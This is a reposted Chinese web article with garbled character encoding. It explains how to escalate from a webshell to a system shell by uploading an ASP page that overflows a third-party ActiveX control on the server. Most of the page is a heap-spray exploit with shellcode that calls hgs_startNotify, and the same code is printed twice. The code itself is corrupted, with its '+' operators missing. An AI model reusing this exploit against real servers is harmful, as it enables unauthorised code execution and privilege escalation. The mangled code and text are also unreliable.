webshell中上傳asp文件調(diào)用服務(wù)器ActiveX控件溢出獲取shell
發(fā)布日期:2021-12-30 17:39 | 文章來源:gibhub
做windows系統(tǒng)滲透測試的時候有webshell了,但是拿不到shell,用來提升權(quán)限,也是個很郁悶的事情。一般來說,使用mdb jet引擎的溢出比較常見,但是有時候根據(jù)服務(wù)器上安裝的第三方軟件,使用一些新的方法,或許能有一點(diǎn)轉(zhuǎn)機(jī)。這里主要描述一下調(diào)用activex溢出服務(wù)器的思
Code:
Quote:
<%@ LANGUAGE = JavaScript %>
<%
var act=new ActiveXObject("HanGamePluginCn18.HanGamePluginCn18.1");
//run calc.exe
var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize shellcode.length;
while (bigblock.length<slackspace) bigblock =bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length slackspace<0x40000) block = block block fillblock;
memory = new Array();
for (x=0; x<300; x ) memory[x] = blockshellcode;
var buffer = ’’;
while (buffer.length < 1319) buffer ="A";
buffer=buffer "\x0a\x0a\x0a\x0a" buffer;
act.hgs_startNotify(buffer);
%>
Code:
Quote:
<%@ LANGUAGE = JavaScript %>
<%
var act=new ActiveXObject("HanGamePluginCn18.HanGamePluginCn18.1");
//run calc.exe
var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize shellcode.length;
while (bigblock.length<slackspace) bigblock =bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length slackspace<0x40000) block = block block fillblock;
memory = new Array();
for (x=0; x<300; x ) memory[x] = blockshellcode;
var buffer = ’’;
while (buffer.length < 1319) buffer ="A";
buffer=buffer "\x0a\x0a\x0a\x0a" buffer;
act.hgs_startNotify(buffer);
%>
版權(quán)聲明:本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有,歡迎引用、轉(zhuǎn)載,請保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站,禁止在非maisonbaluchon.cn所屬的服務(wù)器上建立鏡像,否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來,僅供學(xué)習(xí)參考,不代表本站立場,如有內(nèi)容涉嫌侵權(quán),請聯(lián)系alex-e#qq.com處理。
相關(guān)文章
關(guān)注官方微信